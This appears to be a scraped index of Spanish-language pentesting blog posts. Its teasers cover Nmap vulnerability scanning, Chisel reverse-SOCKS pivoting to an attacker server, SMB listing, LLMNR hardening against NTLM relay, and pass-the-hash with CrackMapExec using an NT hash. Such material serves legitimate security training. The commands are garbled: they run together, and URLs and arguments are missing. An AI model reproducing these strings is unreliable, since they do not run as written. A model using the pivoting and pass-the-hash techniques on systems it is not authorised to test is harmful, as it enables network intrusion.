Usando NMAP para escanear vulnerabilidades Nmap-vulnerscd /usr/share/nmap/scripts/git clone -sV –script vulners [–script-args mincvss=]nmap -sV –script nmap-vulners/ -p80,223 Nmap – vulnnmap -sV –script vuln Nmap-vulscancd /usr/share/nmap/scripts/git clone -s pwd/scipag_vulscan /usr/share/nmap/scripts/vulscancd vulscan/utilities/updater/chmod +x -sV –script vulscannmap -sV –script vulscan –script-args vulscandb=exploit.csv -p 80,233

Técnicas de Pivoting Chisel You can download it from the releases page of You need to use the same version for client and server socks ./chisel server -p 8080 –reverse #Server — Attacker ./chisel-x64.exe client R:socks #Client — Read more ›

Pentesting SMB Para realizar un listado recursivo -R, y con -p en lugar de la contraseña se puede usar el hash “NT:LM”

NTLM Relay Remediación Disabling LLMNR Open the Group Policy Editor in your version of Windows Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client Under DNS Client, make sure that “Turn OFF Multicast Name Read more ›

Diferentes maneras de emplear el Pass the Hash (PTH) Crackmapexec cme smb -u user -H BD1C6503987F8FF006296118F359FA79  -d domain.localSMB     445    PC01      [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)SMB Read more ›